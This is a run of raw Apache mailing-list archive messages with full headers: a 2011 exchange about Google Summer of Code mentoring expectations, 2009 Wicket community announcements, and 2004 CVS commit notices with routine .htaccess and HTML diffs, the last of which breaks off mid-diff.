ESMTP; Wed, 23 Feb 2011 14:03:45 +0000 Received: from smtp1.mail.ox.ac.uk ([161.129.204.104]) by relay5.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1PsFJL-0006wb-JK for [email protected]; Wed, 23 Feb 2011 14:03:24 +0000 Received: from dhcp39.oucs.ox.ac.uk ([161.129.204.104]) by smtp1.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1PsFJL-0000xX-6C for [email protected]; Wed, 23 Feb 2011 14:03:23 +0000 Message-ID: <[email protected]> Date: Wed, 23 Feb 2011 14:03:26 +0000 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC 2011 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 On 23/02/2011 13:42, Pasindu Ariyarathna wrote: > I am computer Engineering Student and I'm willing to participate > Google summer of code competition this year. I have seen your last > year completed projects and I am interested in that kind of projects . > So I would like to know up to what extent of programming knowledge is > required to successfully complete a project of your organization this > year. Generally speaking you need to have the skills to complete the task that you take on. I realise that's not too helpful, but there are different tasks, some of them quite complex. Your job, during the application period, is to work with potential mentors to ensure you can actually complete the task in hand. You must understand that your mentors are not here to teach you how to do the task. They will guide you and point you in the right direction, but they will not tell you how to do it. What this means is that you need sufficient skills to understand what your mentor is telling you and sufficient self-drive to go off and figure out how to complete the task. To put it one final way - you are not expected to be a wonder coder, but you are expected to be able to work independently, with mentored guidance. Ross From [email protected] Mon Feb 28 14:31:26 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22725 invoked from network); 28 Feb 2011 14:31:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Feb 2011 14:31:25 -0000 Received: (qmail 18205 invoked by uid 500); 28 Feb 2011 14:31:24 -0000 Delivered-To: [email protected] Received: (qmail 17977 invoked by uid 500); 28 Feb 2011 14:31:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17954 invoked by uid 99); 28 Feb 2011 14:31:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 28 Feb 2011 14:31:21 +0000 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mailout-de.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 28 Feb 2011 14:31:12 +0000 Received: (qmail invoked by alias); 28 Feb 2011 14:30:50 -0000 Received: from pool-74-101-86-127.nycmny.east.verizon.net (EHLO tonimac-2.local) [161.129.204.104] by mail.gmx.net (mp060) with SMTP; 28 Feb 2011 15:30:50 +0100 X-Authenticated: #22961642 X-Provags-ID: V01U2FsdGVkX1/HSjVhwdHHMoy9cAtZOWwcjOvjpZDkKRG5BiAj04 5DMezET7RtXVbY Message-ID: <[email protected]> Date: Mon, 28 Feb 2011 09:30:48 -0500 From: Antoine Levy-Lambert <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] CC: [email protected], [email protected] Subject: Re: GSoC 2011 References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 OpenPGP: id=265B4C63 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Y-GMX-Trusted: 0 Hello Ross and others I am looking at these pages http://community.apache.org/gsoc.html http://community.apache.org/guide-to-being-a-mentor.html because myself and Nicolas Lalevée are interested in mentoring for Ant and Ivy I notice that the web pages are a bit out of date (they refer to GSOC 2010 and the links to issues filters in JIRA need updating). Where are the pages sources in svn ? Can I help updating them ? Regards, Antoine
From [email protected] Mon Mar 16 17:11:09 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35085 invoked from network); 16 Mar 2009 17:11:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Mar 2009 17:11:09 -0000 Received: (qmail 38122 invoked by uid 500); 16 Mar 2009 17:11:05 -0000 Delivered-To: [email protected] Received: (qmail 37986 invoked by uid 500); 16 Mar 2009 17:11:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <announce.wicket.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37580 invoked by uid 99); 16 Mar 2009 17:11:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Mar 2009 10:11:02 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Mar 2009 17:10:52 +0000 Received: by nf-out-0910.google.com with SMTP id k4so1048583nfd.22 for <multiple recipients>; Mon, 16 Mar 2009 10:10:32 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; bh=o/217O6UTrDvWiWQi+0eDDXNfTmsd7MyfACzrSXKdwY=; b=ir8LcuaLMDwqiBaJW/xY/K9Deo4SRokUOw/7thSfD395QwnwI4Y35XfHzHapa0oIVZ dIQ4w32WWIhWHgllXaS6wzbRc3uiExpJ1oDzZ70qnLMFe1iwNIql2z1HvlCibnwqYOWT xVHDg4FtzQ3laAiTS2bW/CNNIJQN8JWFS+lJA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type:content-transfer-encoding; b=eotv0B3Hgrgyf7jl8GyGI1uBrfPPugn3wQ6BOlcP0slWUYym/SvwuQhJhIvmzwLSNM ibsADkPsh9qQ4MF3sC9xgJkCsMOnqOtKO7tuHrSeDoheylSJd6q04fLThP9b5pWr0nQN STYXtsX9cQj1sJ/oHwd8ZmQ2s+ihPDNrN6IE8= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id c56mr1865505wea.45.1237223431946; Mon, 16 Mar 2009 10:10:31 -0700 (PDT) Date: Mon, 16 Mar 2009 18:10:31 +0100 X-Google-Sender-Auth: 59d1645c41553f05 Message-ID: <[email protected]> Subject: Wicket Meetup Amsterdam 24th March 2009 From: Martijn Dashorst <[email protected]> To: [email protected], [email protected], [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org The date has been set: on Tuesday 24 March 2009 the Wicket Community will convene in Amsterdam at the M=F6venpick hotel starting at 19:00 until 22:00. This is a FREE event thanks to the following sponsors: - Hippo (http://onehippo.com) - Lucid Imagination (http://lucidimagination.com) - Topicus (http://topicus.nl) The current program is as follows: * Martijn Dashorst - Introduction to Wicket (if there are newbies in the ro= om) * Pieter Claassen - "Wicket and db4o" * Martijn Dashorst - "Getting your app production ready and in production" * Johan Compagner - anything * Berry van Halderen & Arthur Bogaart - Automated integration testing for Wicket apps (working title) We are still looking for new, fresh presentations to fill the program. You can register for free at the following page: https://spreadsheets.google.com/viewform?formkey=3DcDFlMTdSV3dKT1lkYUlVa2lW= UFdkQXc6MA.. (This will allow us to contact you in case of event changes, and to print a badge!) Martijn --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 17 10:34:58 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48992 invoked from network); 17 Mar 2009 10:34:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Mar 2009 10:34:58 -0000 Received: (qmail 37264 invoked by uid 500); 17 Mar 2009 10:34:53 -0000 Delivered-To: [email protected] Received: (qmail 37204 invoked by uid 500); 17 Mar 2009 10:34:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <announce.wicket.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37127 invoked by uid 99); 17 Mar 2009 10:34:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Mar 2009 03:34:52 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f160.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Mar 2009 10:34:44 +0000 Received: by ewy4 with SMTP id 4so3858098ewy.8 for <multiple recipients>; Tue, 17 Mar 2009 03:34:23 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=PViqpxVh1jZuBVl5Femz+CRHVhp1/Mwaf2RA+Prwxs8=; b=hI6jOX1FLtRpYQSsWdLLICKWLMIAYtBoCXongCnkDmhJlJrTZtnAf+59C/lfZSBdgX n+brC9rbficG0NfQtEN46qHi0WiCv5Un20UY3+2z+dxmF5NF77kiCcyDWZty2fEkElzB Fw9mA59iKa/25lWxAH4JHUxbbP+SJgdzBOHG0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=LS+Q7IYbELt4oMKzRNOaTQtcggea1yXzFHb44/75Y0+rEyVF37T616lMkZXroxZSKI GyMYEolJJClVihQIWF21PNBp4Ay3bmuas6uE5tk3bFJ2FD6mXaI4FHTDxCCp2btf6TWk I9xJkOwcNRyN5SaayUvpc/gUKFnBa0ch665Z0= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id y54mr2162673web.70.1237286062913; Tue, 17 Mar 2009 03:34:22 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 17 Mar 2009 11:34:22 +0100 Message-ID: <[email protected]> Subject: Re: Wicket Meetup Amsterdam 24th March 2009 From: Martijn Dashorst <[email protected]> To: [email protected], [email protected], [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Updates: An additional sponsor makes this event even better (more free beer?)! - Hippo (http://onehippo.com) - Lucid Imagination (http://lucidimagination.com) - Topicus (http://topicus.nl) - Func (http://func.nl) And another presentation: Daan van Etten is going to give an introduction to Wicket & Scala The current program is as follows: * Martijn Dashorst - Introduction to Wicket (if there are newbies in the room) * Pieter Claassen - "Wicket and db4o" * Martijn Dashorst - "Getting your app production ready and in production" * Johan Compagner - anything * Berry van Halderen & Arthur Bogaart - Automated integration testing for Wicket apps (working title) * Daan van Etten - Wicket and Scala We are still looking for new, fresh presentations to fill the program. You can register for free at the following page: https://spreadsheets.google.com/viewform?formkey=cDFlMTdSV3dKT1lkYUlVa2lWUFdkQXc6MA.. (This will allow us to contact you in case of event changes, and to print a badge!) See you in Amsterdam! Martijn --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 28 13:20:39 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92210 invoked from network); 28 Mar 2009 13:20:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2009 13:20:38 -0000 Received: (qmail 77011 invoked by uid 500); 28 Mar 2009 13:20:37 -0000 Delivered-To: [email protected] Received: (qmail 76914 invoked by uid 500); 28 Mar 2009 13:20:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <announce.wicket.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76561 invoked by uid 99); 28 Mar 2009 13:20:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 28 Mar 2009 13:20:36 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f157.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 28 Mar 2009 13:20:27 +0000 Received: by ewy1 with SMTP id 1so1385744ewy.8 for <multiple recipients>; Sat, 28 Mar 2009 06:20:07 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=tS2zHkFOUyF0VW9Rx48F2oRmYeK3MSIB6w8Glyc8VoM=; b=MeQiog6mFHcwhH+1x8BzyG7q+yP44FpZpTVK8AweIINIcpgNV7qS+l7yG3e+MA5vuf Sjrn6kLMSRM+YBNY8EYSqsHls79OGQuw0VKTIzhzgF0UQx1uU8uoZT4z302/J6evqOME TGgDvfrjAQiPVIW7YS/v3lTXs3t9ykxEFGitc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=lshmii0ecp0lKbouKq5YD5IOydNAGlZb1OhwDHq2cPOlExnIG5bqkV8Bu7EEst4z8c 2MprcPPIEMCVPbU8VpyMqaQbCiuA0oij8m0VoZxUQaaCy2ZIzKIwZv0mrSKW+lK+SLSJ 2GFdcvVspSIOxSkpUEBYwX/NHIglcJI8Ct1pg= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id h58mr1129874weh.60.1238246407276; Sat, 28 Mar 2009 06:20:07 -0700 (PDT) Date: Sat, 28 Mar 2009 14:20:07 +0100 Message-ID: <[email protected]> Subject: Wicket stuff is moving to a new IP From: Martijn Dashorst <[email protected]> To: [email protected], [email protected], [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org The wicketstuff server is moving to a new IP, so you might run into problems when trying to access the documentation, wiki, jira and build server... Martijn -- Become a Wicket expert, learn from the best: http://wicketinaction.com Apache Wicket 1.3.5 is released Get it now: http://www.apache.org/dyn/closer.cgi/wicket/1.3. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 30 09:54:34 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45913 invoked from network); 30 Mar 2009 09:54:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2009 09:54:33 -0000 Received: (qmail 58412 invoked by uid 500); 30 Mar 2009 09:54:32 -0000 Delivered-To: [email protected] Received: (qmail 58322 invoked by uid 500); 30 Mar 2009 09:54:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <announce.wicket.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58128 invoked by uid 99); 30 Mar 2009 09:54:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 30 Mar 2009 09:54:31 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f157.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 30 Mar 2009 09:54:23 +0000 Received: by ewy1 with SMTP id 1so1904166ewy.8 for <multiple recipients>; Mon, 30 Mar 2009 02:54:03 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=/Cwt/jpkyEVheVaJl6FwsivuPQkabxzuMVllC9N5FyI=; b=r0oVkMVx0i4uxqeXJB38YP1fqjlm1hvwGfELw3igU36OL3u3FdzHrR6D3f0HwIgoKR ejO3eS53Wh5/WcKFGrGcJuSFgiHwsMxDhSWz1cAjfLfb63OmilGiC2NFb03Adlx1YfDq p6lRA/1v4/wBMwUhTRLu4ebBsDm2fdhd77tqE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=e5S0ZJY2rNbDA2dOABZgl+KI2h8sGgyZT8wIjWqc7ti0FSE+RZ8CoT6WZPfTwR4i/+ FHD3DmoMR4Mhz2Q4O8OGFD9CRdORm6cfyKqG6lQVV6CUFRFAk/sxY5/+DcYHj7xfD6NL FMDQC2atPkAJrpr87YRiKRjA9RPOCeE5sRBCE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id x43mr1568430web.42.1238406843521; Mon, 30 Mar 2009 02:54:03 -0700 (PDT) Date: Mon, 30 Mar 2009 11:54:03 +0200 Message-ID: <[email protected]> Subject: IMPORTANT: Nabble posting disabled due to spam From: Martijn Dashorst <[email protected]> To: [email protected], [email protected], [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org I've disabled posting through the Nabble interface because they don't seem able to prevent spam coming through their interface. If you want to ask a question, please subscribe to the list. If you don't want to do that, complain with Nabble support to improve their spam filtering. Martijn --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Mon Aug 02 04:54:37 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14202 invoked from network); 2 Aug 2004 04:54:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Aug 2004 04:54:36 -0000 Received: (qmail 67333 invoked by uid 500); 2 Aug 2004 04:54:36 -0000 Delivered-To: [email protected] Received: (qmail 67310 invoked by uid 500); 2 Aug 2004 04:54:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 67296 invoked by uid 500); 2 Aug 2004 04:54:36 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 2 Aug 2004 04:54:35 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/targets/forrest .htaccess X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N crossley 2004/08/01 21:54:35 Modified: targets/forrest .htaccess Log: Add re-direct from old mail-archives.* to consolidated mail-lists.* Revision Changes Path 1.3 +1 -0 xml-site/targets/forrest/.htaccess Index: .htaccess =================================================================== RCS file: /home/cvs/xml-site/targets/forrest/.htaccess,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- .htaccess 17 Jun 2004 06:14:42 -0000 1.2 +++ .htaccess 2 Aug 2004 04:54:34 -0000 1.3 @@ -22,5 +22,6 @@ RedirectMatch Permanent ^/forrest/validation(.*) http://forrest.apache.org/docs/validation$1 RedirectMatch Permanent ^/forrest/wiki-sample(.*) http://forrest.apache.org/docs/wiki-sample$1 RedirectMatch Permanent ^/forrest/your-project(.*) http://forrest.apache.org/docs/your-project$1 +RedirectMatch Permanent ^/forrest/mail-archives(.*) http://forrest.apache.org/mail-lists$1 # catch the rest RedirectMatch Permanent ^/forrest/(.*) http://forrest.apache.org/$1 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 05 00:39:39 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13589 invoked from network); 5 Aug 2004 00:39:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Aug 2004 00:39:39 -0000 Received: (qmail 18049 invoked by uid 500); 5 Aug 2004 00:39:37 -0000 Delivered-To: [email protected] Received: (qmail 18028 invoked by uid 500); 5 Aug 2004 00:39:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 18015 invoked by uid 500); 5 Aug 2004 00:39:36 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 5 Aug 2004 00:39:35 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/targets/xmlbeans/resources - New directory X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N daveremy 2004/08/04 17:39:35 xml-site/targets/xmlbeans/resources - New directory --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 05 00:40:49 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13885 invoked from network); 5 Aug 2004 00:40:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Aug 2004 00:40:49 -0000 Received: (qmail 18543 invoked by uid 500); 5 Aug 2004 00:40:49 -0000 Delivered-To: [email protected] Received: (qmail 18524 invoked by uid 500); 5 Aug 2004 00:40:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 18511 invoked by uid 500); 5 Aug 2004 00:40:48 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 5 Aug 2004 00:40:44 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/targets/xmlbeans/sourceAndBinaries index.html X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N daveremy 2004/08/04 17:40:44 Modified: targets/xmlbeans index.html targets/xmlbeans/community index.html targets/xmlbeans/documentation conInstallGuide.html index.html targets/xmlbeans/projectManagement index.html targets/xmlbeans/sourceAndBinaries index.html Added: targets/xmlbeans/resources index.html index.pdf Log: Remove some links and add Resources Tab Revision Changes Path 1.7 +9 -0 xml-site/targets/xmlbeans/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/xmlbeans/index.html,v retrieving revision 1.6 retrieving revision 1.7 diff -u -r1.6 -r1.7 --- index.html 19 Jun 2004 02:01:54 -0000 1.6 +++ index.html 5 Aug 2004 00:40:43 -0000 1.7 @@ -91,6 +91,15 @@ <td colspan="3" height="1"></td> </tr> </table> +</td><td width="6"><img alt="" height="8" width="6" src="skin/images/spacer.gif"></td><td valign="bottom"> +<table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> +<tr> +<td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="resources/index.html">Resources</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="skin/images/tab-right.gif"></td> +</tr> +<tr> +<td colspan="3" height="1"></td> +</tr> +</table> </td> </tr> </table> 1.5 +9 -0 xml-site/targets/xmlbeans/community/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/xmlbeans/community/index.html,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 --- index.html 19 Jun 2004 02:01:54 -0000 1.4 +++ index.html 5 Aug 2004 00:40:44 -0000 1.5 @@ -91,6 +91,15 @@ <td colspan="3" height="1"></td> </tr> </table> +</td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> +<table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> +<tr> +<td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../resources/index.html">Resources</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> +</tr> +<tr> +<td colspan="3" height="1"></td> +</tr> +</table> </td> </tr> </table> 1.4 +9 -0 xml-site/targets/xmlbeans/documentation/conInstallGuide.html Index: conInstallGuide.html =================================================================== RCS file: /home/cvs/xml-site/targets/xmlbeans/documentation/conInstallGuide.html,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- conInstallGuide.html 15 Jul 2004 18:29:54 -0000 1.3 +++ conInstallGuide.html 5 Aug 2004 00:40:44 -0000 1.4 @@ -91,6 +91,15 @@ <td colspan="3" height="1"></td> </tr> </table> +</td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> +<table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> +<tr> +<td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../resources/index.html">Resources</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> +</tr> +<tr> +<td colspan="3" height="1"></td> +</tr> +</table> </td> </tr> </table> 1.7 +9 -0 xml-site/targets/xmlbeans/documentation/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/xmlbeans/documentation/index.html,v retrieving revision 1.6 retrieving revision 1.7 diff -u -r1.6 -r1.7 --- index.html 15 Jul 2004 18:29:54 -0000 1.6 +++ index.html 5 Aug 2004 00:40:44 -0000 1.7 @@ -91,6 +91,15 @@ <td colspan="3" height="1"></td> </tr> </table> +</td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> +<table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> +<tr> +<td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../resources/index.html">Resources</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> +</tr> +<tr> +<td colspan="3" height="1"></td> +</tr> +</table> </td> </tr> </table> 1.9 +9 -9 xml-site/targets/xmlbeans/projectManagement/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/xmlbeans/projectManagement/index.html,v retrieving revision 1.8 retrieving revision 1.9 diff -u -r1.8 -r1.9 --- index.html 23 Jul 2004 22:53:27 -0000 1.8 +++ index.html 5 Aug 2004 00:40:44 -0000 1.9 @@ -91,6 +91,15 @@ <td valign="top" width="5" bgcolor="#4C6C8F"><img height="5" width="5" alt="" src="../skin/images/tabSel-left.gif"></td><td valign="middle" bgcolor="#4C6C8F"><font color="#ffffff" size="2" face="Arial, Helvetica, Sans-serif"><b><a class="base-selected" href="../projectManagement/index.html">Project</a></b></font></td><td valign="top" width="5" bgcolor="#4C6C8F"><img height="5" width="5" alt="" src="../skin/images/tabSel-right.gif"></td> </tr> </table> +</td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> +<table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> +<tr> +<td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" 